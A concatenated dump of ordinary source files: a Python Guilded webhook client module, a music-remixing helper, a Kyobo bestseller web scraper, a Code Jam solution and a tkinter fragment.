auth_token=auth_token, userbot=userbot)\n\n def execute_webhook(\n self,\n webhook_id: str,\n token: str,\n *,\n session: aiohttp.ClientSession,\n payload: Optional[Dict[str, Any]] = None,\n multipart: Optional[List[Dict[str, Any]]] = None,\n files: Optional[List[File]] = None,\n ):\n route = UserbotRoute('POST', f'/webhooks/{webhook_id}/{token}', override_base=UserbotRoute.MEDIA_BASE)\n return self.request(route, session, webhook_id, payload=payload, multipart=multipart, files=files)\n\n def delete_channel_message(\n self,\n webhook_id: str,\n channel_id: str,\n message_id: str,\n *,\n auth_token: str,\n userbot: bool,\n session: aiohttp.ClientSession,\n ):\n cls = UserbotRoute if userbot else Route\n route = cls('DELETE', f'/channels/{channel_id}/messages/{message_id}')\n return self.request(route, session, webhook_id, auth_token=auth_token, userbot=userbot)\n\n def get_channel_message(\n self,\n webhook_id: str,\n channel_id: str,\n message_id: str,\n *,\n auth_token: str,\n userbot: bool,\n session: aiohttp.ClientSession,\n ):\n if userbot:\n route = UserbotRoute('GET', f'/content/route/metadata?route=//channels/{channel_id}/chat?messageId={message_id}')\n else:\n route = Route('GET', 
f'/channels/{channel_id}/messages/{message_id}')\n return self.request(route, session, webhook_id, auth_token=auth_token, userbot=userbot)\n\n\nasync_context: ContextVar[AsyncWebhookAdapter] = ContextVar('async_webhook_context', default=AsyncWebhookAdapter())\n\n\nclass _WebhookState:\n __slots__ = (\n '_parent',\n '_webhook',\n 'userbot',\n )\n\n def __init__(self, webhook: Any, parent: Optional[Union[HTTPClient, _WebhookState]], userbot: bool = None):\n self._webhook: Any = webhook\n self.userbot: bool = userbot\n\n self._parent: Optional[HTTPClient]\n if isinstance(parent, _WebhookState):\n self._parent = None\n else:\n self._parent = parent\n\n if self._parent is not None:\n self.userbot = parent.userbot\n\n def _get_team(self, team_id: str):\n if self._parent is not None:\n return self._parent._get_team(team_id)\n return None\n\n def _get_team_channel(self, team_id: str, channel_id: str):\n if self._parent is not None:\n return self._parent._get_team_channel(team_id, channel_id)\n return None\n\n def _get_emoji(self, emoji_id: str):\n if self._parent is not None:\n return self._parent._get_emoji(emoji_id)\n return None\n\n def _get_team_member(self, team_id: str, user_id: str):\n if self._parent is not None:\n return self._parent._get_team_member(team_id, user_id)\n return None\n\n def _get_user(self, user_id: str):\n if self._parent is not None:\n return self._parent._get_user(user_id)\n return None\n\n def store_user(self, data):\n if self._parent is not None:\n return self._parent.store_user(data)\n # state parameter is artificial\n return User(state=self, data=data) # type: ignore\n\n def create_user(self, **data):\n # state parameter is artificial\n return User(state=self, **data) # type: ignore\n\n def create_member(self, **data):\n return Member(state=self, **data)\n\n def __getattr__(self, attr):\n if self._parent is not None:\n return getattr(self._parent, attr)\n\n raise AttributeError(f'PartialWebhookState does not support {attr!r}.')\n\n\nclass WebhookMessage(ChatMessage):\n \"\"\"Represents a message sent from your webhook.\n\n This allows you to delete a message sent by your webhook, although the\n parent webhook requires authentication information.\n\n This inherits from :class:`.ChatMessage` with changes to\n :meth:`delete` to work.\n \"\"\"\n\n _state: _WebhookState\n\n async def edit(self, *args, **kwargs):\n raise AttributeError('WebhookMessages cannot be edited.')\n\n async def delete(self, *, delay: Optional[float] = None) -> None:\n \"\"\"|coro|\n\n Deletes the message.\n\n Parameters\n -----------\n delay: Optional[:class:`float`]\n If provided, the number of seconds to wait before deleting the message.\n The waiting is done in the background and deletion failures are ignored.\n\n Raises\n ------\n Forbidden\n You do not have proper permissions to delete the message.\n NotFound\n The message was deleted already.\n HTTPException\n Deleting the message failed.\n ValueError\n This instance of a webhook does not have authentication info associated with it.\n \"\"\"\n\n if delay is not None:\n\n async def inner_call(delay: float = delay):\n await asyncio.sleep(delay)\n try:\n await self._state._webhook.delete_message(self.channel_id, self.id)\n except HTTPException:\n pass\n\n asyncio.create_task(inner_call())\n else:\n await self._state.delete_message(self.channel_id, self.id)\n\n\nclass BaseWebhook:\n __slots__: Tuple[str, ...] 
= (\n 'auth_token',\n '_state',\n 'id',\n 'channel_id',\n 'team_id',\n 'name',\n '_icon_url',\n 'token',\n 'created_by_id',\n 'created_at',\n 'deleted_at',\n )\n\n def __init__(self, data: WebhookPayload, auth_token: Optional[str] = None, state: Optional[HTTPClient] = None, userbot: bool = None):\n self.auth_token: Optional[str] = auth_token\n if userbot is None and state is not None:\n userbot = state.userbot\n\n self._state: Union[HTTPClient, _WebhookState] = state or _WebhookState(self, parent=state, userbot=userbot)\n self._update(data.get('webhook', data))\n\n def __repr__(self):\n return f'<{self.__class__.__name__} id={self.id!r} team={self.team!r}>'\n\n def _update(self, data: WebhookPayload):\n self.id: str = data['id']\n self.channel_id: Optional[str] = data.get('channelId')\n self.team_id: Optional[str] = data.get('teamId', data.get('serverId'))\n self.name: Optional[str] = data.get('name')\n self._icon_url = data.get('iconUrl')\n self.token: Optional[str] = data.get('token')\n self.created_by_id: Optional[str] = data.get('createdBy')\n self.created_at: Optional[datetime.datetime] = ISO8601(data.get('createdAt'))\n self.deleted_at: Optional[datetime.datetime] = ISO8601(data.get('deletedAt'))\n\n def _update_details(self, data: WebhookPayload):\n # This is specifically for the data received for Get Webhook Details\n self.created_at = ISO8601(data.get('createdAt'))\n self.created_by_id = data.get('createdBy')\n self.token = data.get('token')\n\n def is_partial(self) -> bool:\n \"\"\":class:`bool`: Whether the webhook is a \"partial\" webhook.\"\"\"\n return self.channel_id is None\n\n def is_authenticated(self) -> bool:\n \"\"\":class:`bool`: Whether the webhook has non-webhook authentication information associated with it.\n\n If this is not ``True``, you will not be able to manage messages sent\n by this webhook, nor delete or edit the webhook itself.\n \"\"\"\n return self.auth_token is not None\n\n @property\n def team(self) -> Optional[Team]:\n \"\"\"Optional[:class:`.Team`]: The team this webhook belongs to.\n\n If this is a partial webhook, then this will always return ``None``.\n \"\"\"\n return self._state and self._state._get_team(self.team_id)\n\n @property\n def server(self) -> Optional[Team]:\n \"\"\"Optional[:class:`.Team`]: This is an alias of :attr:`.team`.\"\"\"\n return self.team\n\n @property\n def guild(self) -> Optional[Team]:\n \"\"\"|dpyattr|\n\n This is an alias of :attr:`.team`.\n \"\"\"\n return self.team\n\n @property\n def channel(self) -> Optional[Union[ChatChannel, ListChannel]]:\n \"\"\"Optional[Union[:class:`.ChatChannel`, :class:`.ListChannel`]]: The channel this webhook belongs to.\n\n If this is a partial webhook, then this will always return ``None``.\n \"\"\"\n team = self.team\n return team and team.get_channel(self.channel_id) # type: ignore\n\n @property\n def avatar(self) -> Optional[Asset]:\n \"\"\"Optional[:class:`Asset`]: Returns an :class:`Asset` for the avatar the webhook has.\n\n If the webhook does not have an uploaded avatar, ``None`` is returned.\n If you want the avatar that the webhook displays, consider :attr:`display_avatar` instead.\n \"\"\"\n if self._icon_url is not None:\n return Asset._from_user_avatar(self._state, self._icon_url)\n return None\n\n @property\n def default_avatar(self) -> Asset:\n \"\"\":class:`Asset`: Returns the default avatar.\n This is always `'Gil' <https://img.guildedcdn.com/asset/Default/Gil-md.png>`_.\"\"\"\n return Asset._from_default_asset(self._state, 'Gil')\n\n @property\n def 
display_avatar(self) -> Asset:\n \"\"\":class:`Asset`: Returns the webhook's display avatar.\n\n This is either webhook's default avatar or uploaded avatar.\n \"\"\"\n return self.avatar or self.default_avatar\n\n\nclass Webhook(BaseWebhook):\n \"\"\"Represents an asynchronous webhook.\n\n There are two main ways to use Webhooks. The first is through the ones\n received by the library such as :meth:`.Team.webhooks` and\n :meth:`.ChatChannel.webhooks`. The ones received by the library will\n automatically be bound using the library's internal HTTP session.\n\n The second form involves creating a webhook object manually using the\n :meth:`~.Webhook.from_url` or :meth:`~.Webhook.partial` classmethods.\n\n For example, creating a webhook from a URL and using :doc:`aiohttp <aio:index>`:\n\n .. code-block:: python3\n\n from guilded import Webhook\n import aiohttp\n\n async def foo():\n async with aiohttp.ClientSession() as session:\n webhook = Webhook.from_url('url-here', session=session)\n await webhook.send('Hello World')\n\n .. container:: operations\n\n .. describe:: x == y\n\n Checks if two webhooks are equal.\n\n .. describe:: x != y\n\n Checks if two webhooks are not equal.\n\n Attributes\n ------------\n id: :class:`str`\n The webhook's ID\n token: Optional[:class:`str`]\n The authentication token of the webhook. If this is ``None``\n then the webhook cannot be used to send messages.\n team_id: Optional[:class:`str`]\n The team ID this webhook is for.\n channel_id: Optional[:class:`str`]\n The channel ID this webhook is for.\n name: Optional[:class:`str`]\n The webhook's name.\n \"\"\"\n\n __slots__: Tuple[str, ...] = ('session',)\n\n def __init__(self, data, session: aiohttp.ClientSession, auth_token: Optional[str] = None, state: Optional[HTTPClient] = None, userbot: Optional[bool] = None):\n super().__init__(data, auth_token, state, userbot)\n self.session = session\n\n @property\n def url(self) -> str:\n \"\"\":class:`str`: Returns the webhook's url.\"\"\"\n return f'https://media.guilded.gg/webhooks/{self.id}/{self.token}'\n\n @classmethod\n def partial(\n cls,\n id: str,\n token: str,\n *,\n session: aiohttp.ClientSession,\n auth_token: Optional[str] = None,\n bot: Optional[bool] = True\n ) -> Webhook:\n \"\"\"Creates a partial :class:`Webhook`.\n\n Parameters\n -----------\n id: :class:`str`\n The ID of the webhook.\n token: :class:`str`\n The authentication token of the webhook.\n session: :class:`aiohttp.ClientSession`\n The session to use to send requests with. Note\n that the library does not manage the session and\n will not close it.\n auth_token: Optional[:class:`str`]\n The bot authentication token for authenticated requests\n involving the webhook.\n For user authentication, this should be a ``guilded_mid`` cookie.\n bot: Optional[:class:`bool`]\n Whether ``auth_token`` represents a bot account.\n\n Returns\n --------\n :class:`Webhook`\n A partial :class:`Webhook`.\n A partial webhook is just a webhook object with an ID and a token.\n \"\"\"\n data = {\n 'id': id,\n 'token': token,\n }\n\n return cls(data, session, auth_token=auth_token, userbot=not bot)\n\n @classmethod\n def from_url(\n cls,\n url: str,\n *,\n session: aiohttp.ClientSession,\n auth_token: Optional[str] = None,\n bot: Optional[bool] = True\n ) -> Webhook:\n \"\"\"Creates a partial :class:`Webhook` from a webhook URL.\n\n Parameters\n ------------\n url: :class:`str`\n The URL of the webhook.\n session: :class:`aiohttp.ClientSession`\n The session to use to send requests with. 
Note\n that the library does not manage the session and\n will not close it.\n auth_token: Optional[:class:`str`]\n The bot authentication token for authenticated requests\n involving the webhook.\n For user authentication, this should be a ``guilded_mid`` cookie.\n bot: Optional[:class:`bool`]\n Whether ``auth_token`` represents a bot account.\n\n Returns\n --------\n :class:`Webhook`\n A partial :class:`Webhook`.\n A partial webhook is just a webhook object with an ID and a token.\n\n Raises\n -------\n ValueError\n The URL is invalid.\n \"\"\"\n # media.guilded.gg/webhooks & www.guilded.gg/api/webhooks are both valid,\n # but only the former will be generated by the client.\n # [A-Za-z0-9\\.\\-\\_] may be needlessly broad for tokens.\n m = re.search(r'(?:media\\.guilded\\.gg|guilded\\.gg\\/api)\\/webhooks/(?P<id>[0-9a-fA-F]{8}\\b-[0-9a-fA-F]{4}\\b-[0-9a-fA-F]{4}\\b-[0-9a-fA-F]{4}\\b-[0-9a-fA-F]{12})/(?P<token>[A-Za-z0-9\\.\\-\\_]{80,90})', url)\n if m is None:\n raise ValueError('Invalid webhook URL given.')\n\n data: Dict[str, Any] = m.groupdict()\n return cls(data, session, auth_token=auth_token, userbot=not bot) # type: ignore\n\n @classmethod\n def from_state(cls, data: WebhookPayload, state: HTTPClient) -> Webhook:\n session = state.session\n token = state.cookie if state.userbot else state.token\n return cls(data, session=session, state=state, auth_token=token)\n\n async def fetch(self, *, team: Optional[Team] = None) -> Webhook:\n \"\"\"|coro|\n\n Fetches the current webhook.\n\n This could be used to get a full webhook from a partial webhook.\n\n This requires an authenticated webhook.\n\n Parameters\n -----------\n team: Optional[:class:`.Team`]\n The team that this webhook exists in.\n This is only required if :attr:`.team_id` is ``None``.\n\n Returns\n --------\n :class:`Webhook`\n The fetched webhook.\n\n Raises\n -------\n HTTPException\n Could not fetch the webhook.\n NotFound\n Could not find the webhook by this ID.\n ValueError\n This instance of a webhook does not have authentication info associated with it,\n could not find the webhook by this ID (the client is a user account),\n or no team was provided but it is required.\n \"\"\"\n\n if not self.auth_token:\n raise ValueError('This instance of a webhook does not have authentication info associated with it.')\n if not team and not self.team_id:\n raise ValueError('team must be provided if this instance of a webhook\\'s team_id is None.')\n\n adapter = async_context.get()\n data = await adapter.get_webhook(self.team_id or team.id, self.id, auth_token=self.auth_token, userbot=self._state.userbot, session=self.session)\n if self._state.userbot:\n data = find(lambda d: d['id'] == self.id, data['webhooks'])\n if data is None:\n raise ValueError(f'Could not find the webhook by the ID {self.id}')\n\n return Webhook(data, self.session, auth_token=self.auth_token, state=self._state)\n\n async def fill_details(self, *, team: Optional[Team] = None) -> Webhook:\n \"\"\"|coro|\n\n |onlyuserbot|\n\n Fills the details for the current webhook instance.\n\n This method is mainly useful for filling in :attr:`.token` if it is not already present.\n It is separate from :meth:`.fetch` in that :meth:`.fetch` does not provide :attr:`.token` if the client is a user account.\n Similarly, this method does not provide many of the details that :meth:`.fetch` does.\n\n This requires an authenticated webhook.\n\n Parameters\n -----------\n team: Optional[:class:`.Team`]\n The team that this webhook exists in.\n This is only required if 
:attr:`.team_id` is ``None``.\n\n Returns\n --------\n :class:`Webhook`\n The current webhook instance with details filled in.\n\n Raises\n -------\n HTTPException\n Could not fill the webhook's details.\n ValueError\n This instance of a webhook does not have authentication info associated with it,\n could not find the webhook by this ID,\n or no team was provided but it is required.\n \"\"\"\n\n if not self.auth_token:\n raise ValueError('This instance of a webhook does not have authentication info associated with it.')\n if not team and not self.team_id:\n raise ValueError('team must be provided if this instance of a webhook\\'s team_id is None.')\n\n adapter = async_context.get()\n data = await adapter.get_webhook_details(self.team_id or team.id, self.id, auth_token=self.auth_token, session=self.session)\n if not data:\n raise ValueError(f'Could not find the webhook by the ID {self.id}')\n\n self._update_details(data[self.id])\n return self\n\n async def delete(self, *, team: Optional[Team] = None) -> Optional[datetime.datetime]:\n \"\"\"|coro|\n\n Deletes this webhook.\n\n This requires an authenticated webhook.\n\n Parameters\n -----------\n team: Optional[:class:`.Team`]\n The team that this webhook exists in.\n This is only required if :attr:`.team_id` is ``None`` and the client is a bot account.\n\n Returns\n --------\n Optional[:class:`datetime.datetime`]\n If the client is a user account, the :class:`datetime.datetime`\n when this webhook was deleted, else ``None``.\n\n Raises\n -------\n HTTPException\n Deleting the webhook failed.\n NotFound\n This webhook does not exist.\n Forbidden\n You do not have permissions to delete this webhook.\n ValueError\n This instance of a webhook does not have authentication info associated with it\n or no team was provided but it is required.\n \"\"\"\n if self.auth_token is None:\n raise ValueError('This instance of a webhook does not have authentication info associated with it.')\n if not team and not self.team_id and not self._state.userbot:\n raise ValueError('team must be provided if this instance of a webhook\\'s team_id is None.')\n\n adapter = async_context.get()\n data = await adapter.delete_webhook(self.team_id or team.id, self.id, auth_token=self.auth_token, userbot=self._state.userbot, session=self.session)\n if self._state.userbot:\n deleted_at = ISO8601(data.get('deletedAt'))\n self.deleted_at = deleted_at\n return deleted_at\n\n async def edit(\n self,\n *,\n name: Optional[str] = MISSING,\n avatar: Optional[Union[bytes, File]] = MISSING,\n channel: Optional[Union[ChatChannel, ListChannel]] = None,\n team: Optional[Team] = None,\n ) -> Webhook:\n \"\"\"|coro|\n\n Edits this webhook.\n\n This requires an authenticated webhook.\n\n Parameters\n ------------\n name: Optional[:class:`str`]\n The webhook's new name.\n channel: Union[:class:`ChatChannel`, :class:`ListChannel`]\n The channel to move the webhook to.\n avatar: Optional[Union[:class:`bytes`, :class:`File`]]\n A :term:`py:bytes-like object` or :class:`File` for the webhook's new avatar.\n If the client is a bot user, providing this does nothing.\n team: Optional[:class:`.Team`]\n The team that this webhook exists in.\n This is only required if :attr:`.team_id` is ``None`` and the client is a bot account.\n\n Returns\n --------\n :class:`.Webhook`\n The updated webhook.\n\n Raises\n -------\n HTTPException\n Editing the webhook failed.\n NotFound\n This webhook does not exist.\n ValueError\n This instance of a webhook does not have authentication info associated with it\n or 
no team was provided but it is required.\n \"\"\"\n if self.auth_token is None:\n raise ValueError('This instance of a webhook does not have authentication info associated with it.')\n if not team and not self.team_id and not self._state.userbot:\n raise ValueError('team must be provided if this instance of a webhook\\'s team_id is None.')\n\n payload = {}\n if name is not MISSING:\n payload['name'] = str(name) if name is not None else None\n\n if channel is not None:\n payload['channelId'] = channel.id\n\n if avatar is not MISSING and self._state.userbot:\n if isinstance(avatar, bytes):\n avatar = File(io.BytesIO(avatar), file_type=FileType.image)\n elif not isinstance(avatar, File):\n raise TypeError(f'avatar must be type bytes or File, not {avatar.__class__.__name__}')\n\n avatar.set_media_type(MediaType.user_avatar)\n await avatar._upload()\n payload['iconUrl'] = avatar.url\n\n adapter = async_context.get()\n data = await adapter.update_webhook(\n self.team_id or team.id,\n self.id,\n auth_token=self.auth_token,\n userbot=self._state.userbot,\n payload=payload,\n session=self.session\n )\n\n return Webhook(data=data, session=self.session, auth_token=self.auth_token, userbot=self._state.userbot, state=self._state)\n\n async def move(self, to: Union[ChatChannel, ListChannel]):\n \"\"\"|coro|\n\n Moves this webhook to another channel.\n\n Parameters\n -----------\n to: Union[:class:`.ChatChannel`, :class:`.ListChannel`]\n The channel to move the webhook to.\n\n Returns\n --------\n :class:`.Webhook`\n The updated webhook.\n\n Raises\n -------\n HTTPException\n Editing the webhook failed.\n NotFound\n This webhook does not exist.\n ValueError\n This instance of a webhook does not have authentication info associated with it.\n \"\"\"\n return await self.edit(channel=to, team=to.team)\n\n def _create_message(self, data):\n state = _WebhookState(self, parent=self._state)\n # state may be artificial (unlikely at this point...)\n channel = self.channel or ChatChannel(state=self._state, data={'id': data['channelId']}, group=None) # type: ignore\n # state is artificial\n return WebhookMessage(data=data, state=state, channel=channel, webhook=self) # type: ignore\n\n async def send(\n self,\n content: str = MISSING,\n *,\n embed: Embed = MISSING,\n embeds: Sequence[Embed] = MISSING,\n file: File = MISSING,\n files: Sequence[File] = MISSING,\n ) -> WebhookMessage:\n \"\"\"|coro|\n\n Sends a message using this webhook.\n\n The content must be a type that can convert to a string through ``str(content)``.\n\n To upload a single file, the ``file`` parameter should be used with a\n single :class:`File` object.\n\n If the ``embed`` parameter is provided, it must be of type :class:`Embed` and\n it must be a rich embed type. You cannot mix the ``embed`` parameter with the\n ``embeds`` parameter, which must be a :class:`list` of :class:`Embed` objects to send.\n\n Parameters\n ------------\n content: :class:`str`\n The content of the message to send.\n file: :class:`File`\n The file to upload. This cannot be mixed with ``files`` parameter.\n files: List[:class:`File`]\n A list of files to send with the content. This cannot be mixed with the\n ``file`` parameter.\n embed: :class:`Embed`\n The rich embed for the content to send. This cannot be mixed with\n ``embeds`` parameter.\n embeds: List[:class:`Embed`]\n A list of embeds to send with the content. Maximum of 10. 
This cannot\n be mixed with the ``embed`` parameter.\n\n Returns\n ---------\n :class:`WebhookMessage`\n The message that was sent.\n\n Raises\n --------\n HTTPException\n Sending the message failed.\n NotFound\n This webhook was not found.\n Forbidden\n The token for the webhook is incorrect.\n TypeError\n You specified both ``embed`` and ``embeds`` or ``file`` and ``files``.\n ValueError\n The length of ``embeds`` was invalid or there was no token\n associated with this webhook.\n \"\"\"\n\n if self.token is None:\n raise ValueError('This instance of a webhook does not a token associated with it.')\n\n if content is None:\n content = MISSING\n\n params = handle_message_parameters(\n content=content,\n file=file,\n files=files,\n embed=embed,\n embeds=embeds,\n )\n adapter = async_context.get()\n\n data = await adapter.execute_webhook(\n self.id,\n self.token,\n session=self.session,\n payload=params.payload,\n multipart=params.multipart,\n files=params.files,\n )\n\n message = self._create_message(data)\n self.team_id = message.team_id\n\n return message\n\n async def fetch_message(self, id: str, *, channel: Optional[ChatChannel] = None) -> WebhookMessage:\n \"\"\"|coro|\n\n Retrieves a single :class:`.WebhookMessage` sent by this webhook.\n\n This requires an authenticated webhook.\n\n Parameters\n ------------\n id: :class:`str`\n The message ID to look for.\n channel: Optional[:class:`.ChatChannel`]\n The channel that this message exists in.\n This is only required if :attr:`.channel_id` is ``None``.\n\n Returns\n --------\n :class:`.WebhookMessage`\n The message that was asked for.\n\n Raises\n --------\n NotFound\n The specified message was not found.\n Forbidden\n You do not have the permissions required to get a message.\n HTTPException\n Retrieving the message failed.\n ValueError\n This instance of a webhook does not have authentication info associated with it\n or no channel was provided but it is required.\n \"\"\"\n\n if not self.auth_token:\n raise ValueError('This instance of a webhook does not have authentication info associated with it.')\n if self.channel_id is None or channel is None:\n raise ValueError('channel must be provided if this instance of a webhook\\'s channel_id is None.')\n\n channel_id = channel.id if channel is not None else self.channel_id\n\n adapter = async_context.get()\n data = await adapter.get_channel_message(\n self.id,\n channel_id,\n id,\n auth_token=self.auth_token,\n userbot=self._state.userbot,\n session=self.session,\n )\n if self._state.userbot:\n data = data['metadata']['message']\n\n return self._create_message(data)\n\n async def delete_message(self, id: str, *, channel: Optional[ChatChannel] = None) -> None:\n \"\"\"|coro|\n\n Deletes a message sent by this webhook.\n\n This is a lower level interface to :meth:`.WebhookMessage.delete` in case\n you only have an ID.\n\n This requires an authenticated webhook.\n\n Parameters\n ------------\n id: :class:`str`\n The message ID to delete.\n channel: Optional[:class:`.ChatChannel`]\n The channel that this message exists in.\n This is only required if :attr:`.channel_id` is ``None``.\n\n Raises\n -------\n HTTPException\n Deleting the message failed.\n Forbidden\n Deleted a message that is not yours.\n ValueError\n This instance of a webhook does not have authentication info associated with it\n or no channel was provided but it is required.\n \"\"\"\n\n if self.auth_token is None:\n raise ValueError('This instance of a webhook does not have authentication info associated with it.')\n if 
self.channel_id is None or channel is None:\n raise ValueError('channel must be provided if this instance of a webhook\\'s channel_id is None.')\n\n channel_id = channel.id if channel is not None else self.channel_id\n\n adapter = async_context.get()\n await adapter.delete_channel_message(\n self.id,\n channel_id,\n id,\n auth_token=self.auth_token,\n userbot=self._state.userbot,\n session=self.session,\n )\n\n async def edit_message(self, *args, **kwargs):\n raise AttributeError('Webhook messages cannot be edited.')\n","repo_name":"cosmogonies/VirtualRoleplaying","sub_path":".local/lib/python3.9/site-packages/guilded/webhook/async_.py","file_name":"async_.py","file_ext":"py","file_size_in_byte":37317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9719074272","text":"from pydub import AudioSegment, effects\nfrom .errors import append_error\nimport youtube_dl\nimport librosa\nimport os\n\ndef restrict_musics_number(musics, musics_number):\n musics_number = musics_number if(musics_number <= len(musics)) else len(musics)\n musics = musics[:musics_number] if(musics_number <= len(musics)) else musics\n return musics, musics_number \n\ndef download_by_youtube_dl(name, link):\n try:\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'outtmpl': f'{name}.wav',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'wav',\n 'preferredquality': '192',\n }],\n }\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([link])\n return ydl_opts \n except Exception:\n append_error('youtube_download', name)\n\ndef download_process(musics_number, musics, musics_directory):\n if len(os.listdir(musics_directory)) < musics_number:\n ydl_opts = []\n i = -1\n while(len(os.listdir(musics_directory)) < musics_number):\n i+=1\n name, link = musics[i].get_name(), musics[i].get_link()\n if f'{name}.wav' not in os.listdir(musics_directory):\n try:\n ydl_opts.append(download_by_youtube_dl(name, link))\n except Exception:\n append_error('Download', name)\n\ndef load_audio_segment(file_name, name):\n try:\n return AudioSegment.from_file(file_name)\n except Exception:\n append_error(f'load_audio_segment there is not {file_name} in the {os.getcwd()} directory')\n raise Exception\n\ndef load_librosa(file_name, name):\n try:\n original_audio_time_series, original_sampling_rate_of_audio_times_series = librosa.load(file_name)\n return original_audio_time_series, original_sampling_rate_of_audio_times_series\n except Exception:\n append_error('load_librosa', name)\n raise Exception\n\ndef beat_and_tempo_by_librosa(original_audio_time_series, original_sr, name):\n try:\n return librosa.beat.beat_track(y=original_audio_time_series, sr=original_sr)\n except Exception:\n append_error('tempo, beats = librosa.beat.beat_track()', name)\n raise Exception\n\ndef calc_tempo_by_alvraw(tempo):\n tempo = tempo * 2 if (tempo < 100) else tempo\n alhpa_tempo = tempo % 5,\n playback_bpm_semint = tempo-alhpa_tempo\n playback_bpm = int(playback_bpm_semint)\n return tempo, playback_bpm\n\ndef funk_by_bpm(bpm):\n if bpm<=160 and bpm>=100:\n return f'../funks/funk{bpm-bpm%5}.wav'\n elif bpm >160:\n return f'../funks/funk{160}.wav'\n else:\n return f'../funks/funk{100}.wav'\n\ndef playback_by_audio_segment(file_name, name):\n try:\n return AudioSegment.from_file(file_name)\n except Exception:\n append_error('playback_by_audio_segment', name)\n raise Exception\n\ndef slice_silence(original_audio_time_series, original_sampling_rate_of_audio_times_series, original, 
name):\n try:\n oenv = librosa.onset.onset_detect(y=original_audio_time_series, sr=original_sampling_rate_of_audio_times_series, units='time')\n duration_in_milliseconds = len(original)\n duration_sliced = duration_in_milliseconds - (oenv[0]*1000)\n sliced = original[-duration_sliced:]\n return sliced\n except Exception:\n append_error('slice_silence', name)\n raise Exception\n\ndef bpm_sync(sync_bpm_1, sync_bpm_2, sync_input, name):\n try:\n alfa_sync = (sync_bpm_1 / sync_bpm_2)\n playback_speeded = effects.speedup(sync_input, alfa_sync)\n playback_speeded.export('speeded.wav', format='wav')\n playback_speeded = AudioSegment.from_file('speeded.wav')\n return playback_speeded\n except:\n append_error('bpm_sync', name)\n raise Exception\n\ndef apply(original, versao, name):\n try:\n final = original.overlay(versao, loop=True)\n return final\n except:\n append_error('apply', name)\n raise Exception\n\ndef export_wav(music, youmix_musics_directory, current_directory, name, music_name):\n try:\n os.chdir(youmix_musics_directory)\n music.export(music_name, format='wav')\n os.chdir(current_directory)\n print(f'\\nMusic {name} successfully converted!')\n except Exception:\n append_error('export_wav', name)\n raise Exception","repo_name":"decarvalho33/fun-k","sub_path":"musica_do_seu_jeito-main/youmix/resources/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36960610182","text":"import time as t\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.by import By\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport codecs\nd = datetime.today()\n\nfile_path = f'c:/Work/교보 온라인 베스트셀러 1~50위_{d.year}_{d.month}_{d.day}.html'\n\nwith codecs.open(file_path,mode='w',encoding='utf-8') as f:\n options = webdriver.ChromeOptions()\n options.add_experimental_option('detach',True)\n\n service = webdriver.ChromeService(ChromeDriverManager().install())\n driver = webdriver.Chrome(service=service ,options=options)\n\n driver.get('https://www.kyobobook.co.kr/')\n\n t.sleep(2)\n btn_best_seller = driver.find_element(By.XPATH,'//*[@id=\"welcome_header_wrap\"]/div[3]/nav/ul[1]/li[3]/a')\n btn_best_seller.click()\n t.sleep(2)\n f.write('<oi>')\n for n in range(2,5):\n src = driver.page_source\n\n soup = BeautifulSoup(src, 'html.parser')\n div_list = soup.find_all('li',class_='prod_item')\n for item in div_list:\n f.write('<li style=\"display:flex\"}>')\n f.write('<div>')\n f.write(f'{item.find(\"a\",class_=\"prod_link\")}')\n f.write('</div>')\n f.write('<div>')\n f.write(f'<div>순위: {item.find(\"div\",class_=\"prod_rank\").text}위 </div>\\n')\n f.write(f'<div>책 제목: {item.find(\"span\",class_=\"prod_name\").text} </div>\\n')\n f.write(f'<div>저자: {item.find(\"span\",class_=\"prod_author\").text.split(\"· \")[0]} </div>\\n')\n f.write(f'<div>출판사: {item.find(\"span\",class_=\"prod_author\").text.split(\"· \")[1]} </div>\\n')\n f.write(f'<div>출판일: {item.find(\"span\",class_=\"prod_author\").text.split(\"· \")[2]} </div>\\n')\n f.write(f'<div>가격: {item.find(\"div\",class_=\"prod_price\").text.split(\"|\")[0]} </div>\\n')\n f.write('</div>')\n f.write('</li>')\n driver.find_element(By.XPATH,f'//*[@id=\"tabRoot\"]/div[2]/div[1]/div/a[{n}]').click()\n t.sleep(2)\n 
f.write('</oi>')","repo_name":"jaemin-s/python_basic","sub_path":"web_crawling/kyobo_url.py","file_name":"kyobo_url.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71049049851","text":"from math import exp,log\nfrom scipy.stats import spearmanr\nimport sys\n\ndef solve_one(prob_num):\n a = [\"\"]*100\n for i in range(100):\n a[i] = input()\n\n def est_s(i):\n r = a[i].count(\"1\")/10000\n lhs = exp(6*(r-1))\n exp_minus_s = (1-lhs)/(exp(3)*lhs-exp(-3))\n return -log(exp_minus_s)\n\n s = [est_s(i) for i in range(100)]\n\n def est_q(j):\n lb=-3\n ub=3\n mean = sum([1 for i in range(100) if a[i][j]==\"1\"])\n while abs(ub-lb)>0.01:\n mid=(ub-lb)/2+lb\n if sum([1/(1+exp(mid-s[i])) for i in range(100)]) < mean:\n ub=mid\n else:\n lb=mid\n return lb\n\n q = [est_q(j) for j in range(10000)]\n\n corrs = [spearmanr([-int(x) for x in a[i]],q) for i in range(100)]\n minent = min(corrs)\n ret = corrs.index(minent)+1\n\n print(f\"Case #{prob_num}: {ret}\")\n\nif __name__==\"__main__\":\n t = int(input())\n p = int(input())\n for i in range(t):\n solve_one(i+1)\n\n\n\n\n\n","repo_name":"ayanamizuta/cpro","sub_path":"codejam/2021/first/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1322104830","text":"import tkinter as tk\nimport generator as gen\n\nfrom tkinter import ttk\n\nclass App(tk.Frame):\n\tdef __init__(self, master=None):\n\t\tsuper().__init__(master)\n\t\tself.pack()\n\n\t\tself.create_widgets()\n\t\n\tdef create_widgets(self):\n\t\tself.name_list = tk.Listbox(self, 